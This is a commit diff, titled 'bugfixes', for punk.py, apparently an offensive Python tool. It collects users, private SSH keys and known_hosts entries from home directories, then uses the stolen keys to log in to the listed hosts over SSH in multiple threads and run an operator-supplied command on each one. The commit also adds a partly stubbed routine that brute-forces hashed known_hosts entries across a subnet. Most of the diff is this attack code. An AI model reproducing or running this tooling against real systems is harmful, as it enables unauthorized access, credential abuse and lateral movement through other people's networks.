Skip to content

Commit 4444093

Browse files
r3vnr3vn
committed
bugfixes
1 parent 33c306b commit 4444093

File tree

1 file changed

+93
-16
lines changed

1 file changed

+93
-16
lines changed

punk.py

Lines changed: 93 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -28,6 +28,7 @@
2828
import sys
2929
import threading
3030
import argparse
31+
import ipaddress
3132

3233
try:
3334
import queue as queue
@@ -40,13 +41,13 @@
4041
success = []
4142
users = []
4243
sshKeys = []
43-
CMD = ""
44+
4445

45-
class WorkerThread(threading.Thread) :
46+
class SSHThread(threading.Thread) :
4647

47-
def __init__(self, queue, tid, credentials) :
48+
def __init__(self, q, tid, credentials, CMD="") :
4849
threading.Thread.__init__(self)
49-
self.queue = queue
50+
self.queue = q
5051
self.tid = tid
5152
self.credentials = credentials
5253

@@ -56,7 +57,7 @@ def run(self) :
5657
try :
5758
host = self.queue.get(timeout=1)
5859

59-
except Queue.Empty :
60+
except queue.Empty :
6061
return
6162

6263

@@ -79,25 +80,56 @@ def run(self) :
7980

8081
self.queue.task_done()
8182

83+
84+
class CrackThread(threading.Thread) :
85+
86+
def __init__(self, q, tid, ips, magic, salt, hashed) :
87+
threading.Thread.__init__(self)
88+
self.queue = q
89+
self.tid = tid
90+
self.ips = ips
91+
self.magic = magic
92+
self.salt = salt
93+
self.hashed = hashed
94+
95+
96+
def run(self) :
97+
while True :
98+
host = None
99+
try :
100+
host = self.queue.get(timeout=1)
101+
102+
except queue.Empty :
103+
return
104+
105+
106+
# TODO
107+
108+
109+
self.queue.task_done()
110+
111+
82112
class attack(object):
83113

114+
def __init__(self, cmd):
115+
self.cmd = cmd
84116

85117
def run(self):
86118

87-
queue = Queue.Queue()
88-
credentials = Queue.Queue()
119+
q = queue.Queue()
120+
credentials = queue.Queue()
89121

90122
threads = []
91123
for i in range(1, len(knownHosts)) : # Number of threads
92-
worker = WorkerThread(queue, i, credentials)
124+
worker = SSHThread(q, i, credentials, self.cmd)
93125
worker.setDaemon(True)
94126
worker.start()
95127
threads.append(worker)
96128

97129
for host in knownHosts:
98-
queue.put(host)
130+
q.put(host)
99131

100-
queue.join()
132+
q.join()
101133

102134
# wait for all threads to exit
103135
if not credentials.empty():
@@ -111,6 +143,47 @@ def run(self):
111143
return out[0], out[1] # Output attack: user, host
112144

113145

146+
147+
148+
149+
class crack_host(object):
150+
151+
def __init__(self, host_string, subnet):
152+
""" crack an encrypted known host """
153+
154+
self.magic = host_string.split("|")[0]
155+
self.salt = host_string.split("|")[1]
156+
self.hashed = host_string.split("|")[2]
157+
self.subnet = ipaddress.ip_network(subnet)
158+
159+
def run(self):
160+
161+
q = queue.Queue()
162+
ips = queue.Queue()
163+
164+
threads = []
165+
for i in range(1, 4) : # Number of threads
166+
worker = CrackThread(q, i, ips, self.magic, self.salt, self.hashed)
167+
worker.setDaemon(True)
168+
worker.start()
169+
threads.append(worker)
170+
171+
for host in self.subnet.hosts():
172+
q.put(str(host))
173+
174+
q.join()
175+
176+
# wait for all threads to exit
177+
if not ips.empty():
178+
out = (ips.get()).split(":")
179+
else:
180+
return False
181+
182+
for item in threads :
183+
item.join()
184+
185+
return out[0], out[1] # Output attack: user, host
186+
114187
def discovery(args):
115188
# Search users, SSH keys and known hosts
116189

@@ -147,10 +220,12 @@ def discovery(args):
147220

148221
if args.crack != "":
149222
# crack the hashed known hosts
150-
sys.stdout.write ("TODO")#+host)
223+
sys.stdout.write ("\033[92m[*]\033[0m Cracking known host on %s/.ssh/known_hosts...\033[0m\n" % home )
224+
crack_host(host, args.crack)
225+
sys.stdout.write ("\033[92m[*]\033[0m done.\n")
151226

152227
if encrypted_knownhosts and args.crack == "":
153-
sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s" % home + "/.ssh/known_hosts\033[0m\n")
228+
sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % home )
154229
sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m--crack\033[0m flag to break it\n")
155230

156231

@@ -191,18 +266,21 @@ def discovery(args):
191266

192267
if args.crack != "":
193268
# crack the hashed known hosts
194-
sys.stdout.write ("TODO")#+host)
269+
sys.stdout.write ("\033[92m[*]\033[0m Cracking known host on %s/.ssh/known_hosts...\033[0m\n" % home )
270+
crack_host(host, args.crack)
271+
sys.stdout.write ("\033[92m[*]\033[0m done.\n")
195272

196273

197274
if encrypted_knownhosts and args.crack == "":
198-
sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s" % args.home + homes + "/.ssh/known_hosts\033[0m\n")
275+
sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % args.home )
199276
sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m%s--crack\033[0m flag to break it\n")
200277

201278
FK.close()
202279

203280
return True
204281

205282

283+
206284
if __name__ == "__main__":
207285

208286
sys.stdout.write ("""\033[92m
@@ -258,8 +336,7 @@ def discovery(args):
258336
sys.stdout.write ("\t"+host)
259337

260338
sys.stdout.write ("\n\033[92m[*]\033[0m Starting keys bruteforcing...\n")
261-
CMD = args.run
262-
Attack = attack()
339+
Attack = attack(args.run)
263340

264341
Attack.run()
265342
sys.stdout.write ("\033[92m[*]\033[0m Attack Complete!\n")

0 commit comments

Comments
 (0)